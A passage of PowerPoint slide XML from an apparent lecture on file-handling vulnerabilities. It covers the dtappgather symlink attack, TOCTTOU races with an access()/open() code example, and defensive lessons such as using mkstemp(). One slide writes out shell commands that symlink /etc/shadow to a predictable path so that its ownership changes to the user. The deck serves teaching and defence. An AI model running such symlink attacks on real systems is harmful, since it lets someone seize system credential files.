                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/generic-display-0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not checked for existence prior to the opening of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="462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3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32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32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dtappgather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	-r-------- 1 root other 1500 Dec 29 18:21 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	% ln -s /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/generic-display-0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dtappgather</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>MakeDirectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/generic-display-0: File exists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	-r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-x 1 user users 1500 Dec 29 18:21 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow</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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17451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The type of file being referenced by a path should be checked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For unexpected types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For symbolic links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Temporary files should not be predictable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mkstemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65300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8" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TOCTTOU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622599" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker may race against the application by exploiting the gap between testing and accessing the file (time-of-check-to-time-of-use)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Of-Check (t1): validity of assumption A on entity E is checked </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Of-Use (t2): E is used, assuming A is still valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Of-Attack (t3): assumption A is invalidated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t1 &lt; t3 &lt; t2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data race condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conflicting accesses of multiple processes to shared data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At least one of them is a write access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137613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25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25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25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25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25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25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25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25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r>
              <a:rPr lang="en-US"/>
              <a:t>TOCTTOU Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The access() system call returns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>estimation of the access rights of the user specified by the real UID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The open() system call is executed using the effective </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UID</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>access(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, W_OK) == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	if ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>open(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, O_WRONLY)) &lt; 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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perror(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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write(fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3773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5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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are introduced because the application is not able to correctly handle unexpected events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected errors/exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected interleaving of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unfiltered output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45722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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>versions of system calls that use file descriptors instead of file path names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform file descriptor binding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>first</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For temp file use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mkstemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(), which creates a file AND opens it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7047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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
